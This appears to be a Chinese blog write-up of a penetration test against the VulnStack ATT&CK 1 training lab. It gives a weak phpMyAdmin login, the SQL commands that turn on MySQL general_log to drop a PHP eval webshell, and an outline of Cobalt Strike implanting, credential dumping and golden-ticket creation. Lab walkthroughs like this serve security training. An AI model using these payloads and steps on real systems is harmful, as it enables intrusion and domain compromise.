VulnStack ATT & CK 1 靶场

发布于 2024-10-23 23:42:51 字数 3395 浏览 6 评论 0

环境

信息收集

端口探测

只开放了 803306

目录扫描

访问 80 端口,发现首页为 PHP 探针:

目录扫描:

发现 phpmyadmin。

漏洞挖掘

phpmyadmin 尝试若口令登录: root:root 登录成功。

phpmyadmin 后台的 getshell 方法有很多种 先看下常规的 select into outfile

这里 secure_file_privnull ,不允许写入写出。 放弃此方法,尝试 MySQL 通用查询日志 general_log 写出 webshell 。 先看下全局变量的配置 show global variables like '%general%'

这里并没有开启通用日志,那我就自己打开,并自定义保存文件:

SET GLOBAL general_log = 'ON'
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/shell.php'

这里的绝对路径是通过前面的探针获取到的。

然后写 webshell select '<?php @eval($_POST["bbll]);?>'

蚁剑连接:

内网渗透

首先查看系统位数:

wmic cpu get addresswidth

用 cs 生成木马,上传:

执行:

上线,直接是管理员权限:

查看用户权限:

查看当前登录域:

查看域内用户:

查看域内主机:

查看域管:

dump 密码:

横向移动

DC 上线后,使用 hashdump dump krbtgt NTLM Hash:

制作黄金票据:

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

山人契

暂无简介

0 文章
0 评论
23 人气
更多

推荐作者

玍銹的英雄夢

文章 0 评论 0

我不会写诗

文章 0 评论 0

十六岁半

文章 0 评论 0

浸婚纱

文章 0 评论 0

qq_kJ6XkX

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文